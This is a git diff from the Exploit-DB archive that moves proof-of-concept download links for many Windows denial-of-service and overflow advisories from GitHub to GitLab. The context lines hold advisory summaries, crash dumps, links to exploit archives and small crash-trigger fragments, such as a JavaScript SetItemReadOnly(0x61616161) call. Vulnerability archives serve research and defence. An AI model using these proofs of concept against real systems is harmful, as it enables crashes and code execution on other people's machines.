https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21645.pdf \ No newline at end of file diff --git a/exploits/windows/dos/21741.txt b/exploits/windows/dos/21741.txt index 27acd4384..490f0900d 100644 --- a/exploits/windows/dos/21741.txt +++ b/exploits/windows/dos/21741.txt @@ -3,7 +3,7 @@ SUMMARY XnView Formats PlugIn is prone to an overflow condition. The JLS Plugin (xjpegls.dll) library fails to properly sanitize user-supplied input resulting in a heap-based buffer overflow. With a specially crafted JLS compressed image file, a context-dependent attacker could potentially execute arbitrary code. POC file posted at: http://www.reactionpenetrationtesting.co.uk/vuln.jls - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21741.jls + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21741.jls CVE number: CVE-2012-4988 Impact: High diff --git a/exploits/windows/dos/21747.txt b/exploits/windows/dos/21747.txt index 04cb3039e..5c5478f0f 100644 --- a/exploits/windows/dos/21747.txt +++ b/exploits/windows/dos/21747.txt @@ -10,4 +10,4 @@ Reportedly, this vulnerability may be exploited both as an authenticated user, a It has been reported, by "Fabio Pietrosanti \(naif\)" <naif@blackhats.it>, that disabling the NetBIOS Null Session will prevent exploitation of this vulnerablity. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21747.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21747.zip \ No newline at end of file diff --git a/exploits/windows/dos/21789.txt b/exploits/windows/dos/21789.txt index bb47960a8..e138c9064 100644 --- a/exploits/windows/dos/21789.txt +++ b/exploits/windows/dos/21789.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/5682/info Reportedly, when decoding a HTML email, Outlook Express will stop responding upon encountering a <A HREF> link longer than 4095 characters. It is not confirmed why this behaviour occurs. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21789.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21789.zip \ No newline at end of file diff --git a/exploits/windows/dos/21909.txt b/exploits/windows/dos/21909.txt index 48ec58e04..21cd2d0dd 100644 --- a/exploits/windows/dos/21909.txt +++ b/exploits/windows/dos/21909.txt @@ -4,4 +4,4 @@ PowerFTP server is a shareware ftp server available for the Microsoft Windows pl It has been reported that PowerFTP server does not properly handle long user names. When excessive data is supplied as an argument to the FTP 'USER' command, the server becomes unstable. Exploitation of this vulnerability typically results in a crash of the server, requiring a manual restart to resume FTP service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21909.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21909.tgz \ No newline at end of file diff --git a/exploits/windows/dos/21943.c b/exploits/windows/dos/21943.c index a088658ce..69f80a491 100644 --- a/exploits/windows/dos/21943.c +++ b/exploits/windows/dos/21943.c @@ -237,4 +237,4 @@ main(int argc, char *argv[]) }while(childs--) wait(NULL); -} +} \ No newline at end of file diff --git a/exploits/windows/dos/21953.txt b/exploits/windows/dos/21953.txt index 5a01b84d3..bf39e7fed 100644 --- a/exploits/windows/dos/21953.txt +++ b/exploits/windows/dos/21953.txt @@ -8,4 +8,4 @@ It has been reported that installation of the provided patch will cause some pro A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21953.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21953.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/21954.txt b/exploits/windows/dos/21954.txt index 6181cbed5..db1fd2587 100644 --- a/exploits/windows/dos/21954.txt +++ b/exploits/windows/dos/21954.txt @@ -8,4 +8,4 @@ It has been reported that installation of the provided patch will cause some pro A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21954.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21954.rar \ No newline at end of file diff --git a/exploits/windows/dos/22132.txt b/exploits/windows/dos/22132.txt index bc0efe07d..e10c2ae85 100644 --- a/exploits/windows/dos/22132.txt +++ b/exploits/windows/dos/22132.txt @@ -4,4 +4,4 @@ Microsoft Windows is vulnerable to a denial of service condition when attempting The exact cause of this issue is not currently known, however, this record will be updated if and when more details become available. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22132.otf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22132.otf \ No newline at end of file diff --git a/exploits/windows/dos/22215.txt b/exploits/windows/dos/22215.txt index 3430a3e1e..9fd6a7e7a 100644 --- a/exploits/windows/dos/22215.txt +++ b/exploits/windows/dos/22215.txt @@ -127,4 +127,4 @@ Recommended Bug Title: Stack Overflow starting at wwlib+0x000000000000458e (Hash Proof of concept poc.doc included. Exploit-DB Note: This also works on Word 2007 -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22215.tar.gz \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22215.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/22239.txt b/exploits/windows/dos/22239.txt index 8e18d8e63..3d7d37ca1 100644 --- a/exploits/windows/dos/22239.txt +++ b/exploits/windows/dos/22239.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/6811/info The Opera browser for Win32 (and possibly other) systems is prone to a remotely exploitable buffer overflow condition. For security purposes, Opera will display a warning any time a user of the client visits a link containing a username as part of the URI. An excessively long username will trigger a buffer overflow condition related to this security feature that may overwrite the stack frame of the affected function. Attackers may exploit this vulnerability to execute instructions on client systems. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22239.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22239.tgz \ No newline at end of file diff --git a/exploits/windows/dos/22310.txt b/exploits/windows/dos/22310.txt index 66668ed7f..b590bf9da 100644 --- a/exploits/windows/dos/22310.txt +++ b/exploits/windows/dos/22310.txt @@ -115,4 +115,4 @@ later write. ################################################################################ Proof of concept included. http://www31.zippyshare.com/v/29089672/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22310.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22310.rar \ No newline at end of file diff --git a/exploits/windows/dos/22330.txt b/exploits/windows/dos/22330.txt index 9c477f44e..1aa2f6939 100644 --- a/exploits/windows/dos/22330.txt +++ b/exploits/windows/dos/22330.txt @@ -33,4 +33,4 @@ Excel!Ordinal40+0x1ce0d0: Proof of concept included. http://www36.zippyshare.com/v/48422905/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22330.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22330.rar \ No newline at end of file diff --git a/exploits/windows/dos/22395.txt b/exploits/windows/dos/22395.txt index e9ab65a81..01c0fe9fe 100644 --- a/exploits/windows/dos/22395.txt +++ b/exploits/windows/dos/22395.txt @@ -6,4 +6,4 @@ The vulnerability occurs when numerous chat dialog boxes are opened by the eDonk An attacker can exploit this vulnerability by connecting to a vulnerable eDonkey user and issuing numerous chat requests. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22395.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22395.zip \ No newline at end of file diff --git a/exploits/windows/dos/22402.txt b/exploits/windows/dos/22402.txt index 882bb171f..9e471cf0d 100644 --- a/exploits/windows/dos/22402.txt +++ b/exploits/windows/dos/22402.txt @@ -57,4 +57,4 @@ User mode write access violations that are not near NULL are exploitable. Proof of concept included. http://www21.zippyshare.com/v/83302158/file.html -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22402.rar \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22402.rar \ No newline at end of file diff --git a/exploits/windows/dos/22420.txt b/exploits/windows/dos/22420.txt index 5952330c6..dafd3a8ef 100644 --- a/exploits/windows/dos/22420.txt +++ b/exploits/windows/dos/22420.txt @@ -4,4 +4,4 @@ A denial of service vulnerability has been reported for Emule. The vulnerability This vulnerability was reported for Emule clients prior to 0.27c. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22420.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22420.zip \ No newline at end of file diff --git a/exploits/windows/dos/22464.txt b/exploits/windows/dos/22464.txt index 2dcdaf063..c606c0b24 100644 --- a/exploits/windows/dos/22464.txt +++ b/exploits/windows/dos/22464.txt @@ -37,4 +37,4 @@ ntdll!RtlEnterCriticalSection+0x8: Proof of concept included. http://www42.zippyshare.com/v/23669551/file.html -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22464.pdf \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22464.pdf \ No newline at end of file diff --git a/exploits/windows/dos/22591.txt b/exploits/windows/dos/22591.txt index c5312e9c3..2a52d1a69 100644 --- a/exploits/windows/dos/22591.txt +++ b/exploits/windows/dos/22591.txt @@ -122,4 +122,4 @@ Instruction Address: 0x00000000302d68ca Proof of concept included. http://www19.zippyshare.com/v/5620945/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22591.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22591.rar \ No newline at end of file diff --git a/exploits/windows/dos/22655.txt b/exploits/windows/dos/22655.txt index 87962acd9..f847c43bc 100644 --- a/exploits/windows/dos/22655.txt +++ b/exploits/windows/dos/22655.txt @@ -32,4 +32,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 Proof of concept included. http://www37.zippyshare.com/v/79789962/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22655.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22655.rar \ No newline at end of file diff --git a/exploits/windows/dos/22679.txt b/exploits/windows/dos/22679.txt index ea1dc8526..92ad0c0a2 100644 --- a/exploits/windows/dos/22679.txt +++ b/exploits/windows/dos/22679.txt @@ -70,4 +70,4 @@ VISLIB!Ordinal1+0x28f325 Proof of concept included. http://www24.zippyshare.com/v/85134950/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22679.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22679.rar \ No newline at end of file diff --git a/exploits/windows/dos/22680.txt b/exploits/windows/dos/22680.txt index 8ebcf8bb4..96b41b699 100644 --- a/exploits/windows/dos/22680.txt +++ b/exploits/windows/dos/22680.txt @@ -56,4 +56,4 @@ a heap-based buffer overflow via a specially crafted BMP image containing many ============= http://protekresearchlab.com/exploits/PRL-2012-32.rle -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22680.tar.gz (PRL-2012-32.rle.tar.gz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22680.tar.gz (PRL-2012-32.rle.tar.gz) \ No newline at end of file diff --git a/exploits/windows/dos/22681.txt b/exploits/windows/dos/22681.txt index 1e6d184d2..187765de4 100644 --- a/exploits/windows/dos/22681.txt +++ b/exploits/windows/dos/22681.txt @@ -55,4 +55,4 @@ heap-based buffer overflow via a specially crafted "ImageWidth" value. ============= http://protekresearchlab.com/exploits/PRL-2012-31.tif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22681.tif.tar.gz (PRL-2012-31.tif.tar.gz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22681.tif.tar.gz (PRL-2012-31.tif.tar.gz) \ No newline at end of file diff --git a/exploits/windows/dos/22850.txt b/exploits/windows/dos/22850.txt index 1afc27a2f..6245c3632 100644 --- a/exploits/windows/dos/22850.txt +++ b/exploits/windows/dos/22850.txt @@ -79,4 +79,4 @@ Short Description: WriteAV ############################################################################### Proof of concept included. http://www43.zippyshare.com/v/27372192/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22850.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22850.rar \ No newline at end of file diff --git a/exploits/windows/dos/22855.txt b/exploits/windows/dos/22855.txt index 6a16b2c04..98554778e 100644 --- a/exploits/windows/dos/22855.txt +++ b/exploits/windows/dos/22855.txt @@ -25,6 +25,6 @@ cause a denial of service (application crash) via a crafted Targa image. * PoC : http://www18.zippyshare.com/v/40547915/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22855.tga +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22855.tga * \ No newline at end of file diff --git a/exploits/windows/dos/22878.txt b/exploits/windows/dos/22878.txt index d775b8ea6..c490e2b75 100644 --- a/exploits/windows/dos/22878.txt +++ b/exploits/windows/dos/22878.txt @@ -164,8 +164,8 @@ Short Description: WriteAV Proof of concept : CoolType http://www36.zippyshare.com/v/25032778/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22878-1.rar +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22878-1.rar JP2KLib http://www7.zippyshare.com/v/22655486/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22878-2.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22878-2.rar \ No newline at end of file diff --git a/exploits/windows/dos/22899.txt b/exploits/windows/dos/22899.txt index d4f01998f..c73c271f0 100644 --- a/exploits/windows/dos/22899.txt +++ b/exploits/windows/dos/22899.txt @@ -4,4 +4,4 @@ StarSiege Tribes Game Server has been reported prone to a remotely triggered den The issue presents itself when the affected server receives and processes a malformed UDP datagram. Reportedly when the server handles a UDP datagram containing malformed data, an exception will be thrown and the StarSiege Tribes Game Server will crash. Service will be denied, to current connected users of the system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22899.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22899.zip \ No newline at end of file diff --git a/exploits/windows/dos/23107.txt b/exploits/windows/dos/23107.txt index dd5ddf041..02e4ba953 100644 --- a/exploits/windows/dos/23107.txt +++ b/exploits/windows/dos/23107.txt @@ -75,4 +75,4 @@ User mode write access violations that are not near NULL are exploitable. ################################################################################ Proof of concept included. http://www21.zippyshare.com/v/83302158/file.html -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23107.zip \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23107.zip \ No newline at end of file diff --git a/exploits/windows/dos/23201.txt b/exploits/windows/dos/23201.txt index 6744fd8ef..1fcf3912f 100644 --- a/exploits/windows/dos/23201.txt +++ b/exploits/windows/dos/23201.txt @@ -66,4 +66,4 @@ User mode DEP access violations are exploitable. Proof of concept included. http://www39.zippyshare.com/v/91522221/file.html -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23201.rar \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23201.rar \ No newline at end of file diff --git a/exploits/windows/dos/23246.txt b/exploits/windows/dos/23246.txt index 515b3f5ad..f325e37dd 100644 --- a/exploits/windows/dos/23246.txt +++ b/exploits/windows/dos/23246.txt @@ -87,7 +87,7 @@ overflow occurs POC ==== Attached proof of concept. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23246.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23246.tar.gz !Exploitable output =================== diff --git a/exploits/windows/dos/23288.txt b/exploits/windows/dos/23288.txt index 42e733b88..acc7d664f 100644 --- a/exploits/windows/dos/23288.txt +++ b/exploits/windows/dos/23288.txt @@ -13,4 +13,4 @@ Old version installer at [3] [4]. [3] http://gd.tuwien.ac.at/graphics/irfanview/plugins/irfanview_plugins_433_setup.exe [4] http://gd.tuwien.ac.at/graphics/irfanview/iview433_setup.exe -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23288.tar.gz \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23288.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/23469.txt b/exploits/windows/dos/23469.txt index 39cb9beff..2da5cf688 100644 --- a/exploits/windows/dos/23469.txt +++ b/exploits/windows/dos/23469.txt @@ -54,4 +54,4 @@ Instruction Address: 0x0000000001953095 Proof of concept included. http://www48.zippyshare.com/v/64875465/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23469.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23469.rar \ No newline at end of file diff --git a/exploits/windows/dos/23496.txt b/exploits/windows/dos/23496.txt index f04c359e9..2d2f517ec 100644 --- a/exploits/windows/dos/23496.txt +++ b/exploits/windows/dos/23496.txt @@ -1,4 +1,4 @@ -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23496.tar.gz +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23496.tar.gz CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe" Symbol search path is: *** Invalid *** diff --git a/exploits/windows/dos/23686.txt b/exploits/windows/dos/23686.txt index 9fe87faa8..b34f758eb 100644 --- a/exploits/windows/dos/23686.txt +++ b/exploits/windows/dos/23686.txt @@ -4,4 +4,4 @@ Monkey HTTP Daemon is prone to a denial of service attacks. HTTP GET requests, w The server will need to be restarted to regain normal functionality. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23686.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23686.rar \ No newline at end of file diff --git a/exploits/windows/dos/23846.txt b/exploits/windows/dos/23846.txt index 8063bfe30..9beb35e6f 100644 --- a/exploits/windows/dos/23846.txt +++ b/exploits/windows/dos/23846.txt @@ -4,4 +4,4 @@ Symantec Client Firewall has been reported to be prone to a remote denial of ser It is reported that this vulnerability will have a system wide impact, causing Windows GUI and peripherals that are attached to the host to become unresponsive. A hard reset is reported to be required to restore normal functionality to the system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23846.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23846.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/24135.html b/exploits/windows/dos/24135.html index b0a3fc26b..46210f1bf 100644 --- a/exploits/windows/dos/24135.html +++ b/exploits/windows/dos/24135.html @@ -10,7 +10,4 @@ This issue could be exploited by a remote attacker to cause a denial of service <td> </form> </table> -<link rel="stylesheet" href="link.css"> - - - +<link rel="stylesheet" href="link.css"> \ No newline at end of file diff --git a/exploits/windows/dos/24178.txt b/exploits/windows/dos/24178.txt index 22b78170d..b2ac50a17 100644 --- a/exploits/windows/dos/24178.txt +++ b/exploits/windows/dos/24178.txt @@ -4,4 +4,4 @@ ToCA Race Driver is reportedly affected by multiple remote denial of service vul These issues may allow an attacker to cause the affected application to crash or hang, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24178.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24178.zip \ No newline at end of file diff --git a/exploits/windows/dos/24463.txt b/exploits/windows/dos/24463.txt index 332358e88..b3204745b 100644 --- a/exploits/windows/dos/24463.txt +++ b/exploits/windows/dos/24463.txt @@ -12,4 +12,4 @@ # Reference: http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=70&Itemid=70 # Reference: http://secunia.com/advisories/51602 -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24463.py \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24463.py \ No newline at end of file diff --git a/exploits/windows/dos/24586.txt b/exploits/windows/dos/24586.txt index d4d752a1f..5f8467a66 100644 --- a/exploits/windows/dos/24586.txt +++ b/exploits/windows/dos/24586.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this vulnerability to deny service for legitimate Patches are available to address the issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24586.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24586.zip \ No newline at end of file diff --git a/exploits/windows/dos/24708.txt b/exploits/windows/dos/24708.txt index c623f4b65..e15cf1240 100644 --- a/exploits/windows/dos/24708.txt +++ b/exploits/windows/dos/24708.txt @@ -4,4 +4,4 @@ Master of Orion III is reported prone to multiple remote denial of service vulne Master of Orion III 1.2.5 and prior versions are reportedly affected by these issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24708.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24708.tar \ No newline at end of file diff --git a/exploits/windows/dos/24726.txt b/exploits/windows/dos/24726.txt index e9155106e..959212815 100644 --- a/exploits/windows/dos/24726.txt +++ b/exploits/windows/dos/24726.txt @@ -10,4 +10,4 @@ A second vulnerability is reported in the manner in which 602 LAN SUITE handles A remote attacker may exploit this condition to exhaust all available sockets on a target computer that is running 602 LAN SUITE telnet proxy. This will effectively deny service to legitimate requests. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24726.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24726.zip \ No newline at end of file diff --git a/exploits/windows/dos/24743.txt b/exploits/windows/dos/24743.txt index 3c0071b4d..b8a5144c9 100644 --- a/exploits/windows/dos/24743.txt +++ b/exploits/windows/dos/24743.txt @@ -69,6 +69,6 @@ requires tricking a user into opening a malicious file. 4) POC =========== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24743.rar +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24743.rar Password for attached rar file is 123 \ No newline at end of file diff --git a/exploits/windows/dos/24962.txt b/exploits/windows/dos/24962.txt index 395594213..1e6dc0cc2 100644 --- a/exploits/windows/dos/24962.txt +++ b/exploits/windows/dos/24962.txt @@ -26,4 +26,4 @@ Disasm:0055EB70 |> \33C0 |XOR EAX,EAX Advisory: http://www.fuzzmyapp.com/advisories/FMA-2012-042/FMA-2012-042-EN.xml Exploit PoC: http://fuzzmyapp.com/advisories/FMA-2012-042/FMA-2012-042.pdf - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24962.pdf \ No newline at end of file + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24962.pdf \ No newline at end of file diff --git a/exploits/windows/dos/25007.txt b/exploits/windows/dos/25007.txt index dcd7b743f..d41ef4a6a 100644 --- a/exploits/windows/dos/25007.txt +++ b/exploits/windows/dos/25007.txt @@ -4,4 +4,4 @@ It is reported that Convex 3D is susceptible to a stack-based buffer overflow vu This vulnerability allows remote attackers to alter the proper flow of execution of the application, potentially resulting in the execution of attacker-supplied machine code in the context of the application attempting to read a malicious file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25007.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25007.zip \ No newline at end of file diff --git a/exploits/windows/dos/25140.txt b/exploits/windows/dos/25140.txt index 2fc2b3c76..e71232e37 100644 --- a/exploits/windows/dos/25140.txt +++ b/exploits/windows/dos/25140.txt @@ -1,6 +1,6 @@ WPS Office Wpsio.dll Stack Buffer Overflow Vulnerability -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25140.tgz +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25140.tgz 1 Summary CVE number: CVE-2012-4886 diff --git a/exploits/windows/dos/25255.txt b/exploits/windows/dos/25255.txt index e523ecafd..8a50cdb4a 100644 --- a/exploits/windows/dos/25255.txt +++ b/exploits/windows/dos/25255.txt @@ -8,4 +8,4 @@ Another vulnerability can allow a remote attacker to send a malformed join packe These issues can be exploited to cause a denial of service condition in the server. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25255.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25255.zip \ No newline at end of file diff --git a/exploits/windows/dos/25680.txt b/exploits/windows/dos/25680.txt index db2843f0c..0b6128ef6 100644 --- a/exploits/windows/dos/25680.txt +++ b/exploits/windows/dos/25680.txt @@ -6,4 +6,4 @@ This vulnerability allows remote attackers to crash the game server, denying ser Version 1.03, and prior are affected by this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25680.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25680.zip \ No newline at end of file diff --git a/exploits/windows/dos/25699.txt b/exploits/windows/dos/25699.txt index 49ca6a9df..e91596758 100644 --- a/exploits/windows/dos/25699.txt +++ b/exploits/windows/dos/25699.txt @@ -7,4 +7,4 @@ This issue was reported to affect Halo Game Server 1.06; earlier versions are li UPDATE: The vulnerability also affects Halo Game Server 1.07. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25699-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25699-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/25712.txt b/exploits/windows/dos/25712.txt index 8e884bce6..0022678d8 100644 --- a/exploits/windows/dos/25712.txt +++ b/exploits/windows/dos/25712.txt @@ -131,4 +131,4 @@ As attachment, code to reproduce the crash. <script language='javascript'> //obj.SetItemReadOnly(0x61616161,false); obj.SetItemReadOnly(0x61616161,true); -</script> +</script> \ No newline at end of file diff --git a/exploits/windows/dos/25737.txt b/exploits/windows/dos/25737.txt index 2c8a79f1e..5a49371e1 100644 --- a/exploits/windows/dos/25737.txt +++ b/exploits/windows/dos/25737.txt @@ -4,4 +4,4 @@ The Microsoft 'user32.dll' library is prone to a denial of service vulnerability Reports indicate that this issue exists for user32.dll versions that reside on Microsoft Windows 98SE platforms. Other versions might also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25737.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25737.zip \ No newline at end of file diff --git a/exploits/windows/dos/25991.txt b/exploits/windows/dos/25991.txt index a3f63452d..9e0d33aa6 100644 --- a/exploits/windows/dos/25991.txt +++ b/exploits/windows/dos/25991.txt @@ -6,4 +6,4 @@ This issue was identified by creating random input for the browser, and has not Successful exploitation may result in execution of arbitrary code in the context of the user executing the affected browser. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25991.jpg \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25991.jpg \ No newline at end of file diff --git a/exploits/windows/dos/25992.txt b/exploits/windows/dos/25992.txt index 568ebb441..857a2bee8 100644 --- a/exploits/windows/dos/25992.txt +++ b/exploits/windows/dos/25992.txt @@ -6,6 +6,6 @@ This issue was identified by creating random input for the browser, and has not Successful exploitation results in crashing the affected Web browser. It may be possible that execution of arbitrary code may also be achieved, but this has not been confirmed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25992-1.jpg +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25992-1.jpg -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25992-2.jpg \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25992-2.jpg \ No newline at end of file diff --git a/exploits/windows/dos/26450.pl b/exploits/windows/dos/26450.pl index 7a04494e9..0bea359e6 100755 --- a/exploits/windows/dos/26450.pl +++ b/exploits/windows/dos/26450.pl @@ -33,4 +33,4 @@ $SOCKET = IO::Socket::INET->new(Proto=>'TCP', $SOCKET->send($PAYLOAD); -close($SOCKET); +close($SOCKET); \ No newline at end of file diff --git a/exploits/windows/dos/26457.txt b/exploits/windows/dos/26457.txt index 8382dd337..077fe4bc4 100644 --- a/exploits/windows/dos/26457.txt +++ b/exploits/windows/dos/26457.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue by enticing a user to visit a malicious site Few details are available at this time; this BID will be updated as further information is disclosed. 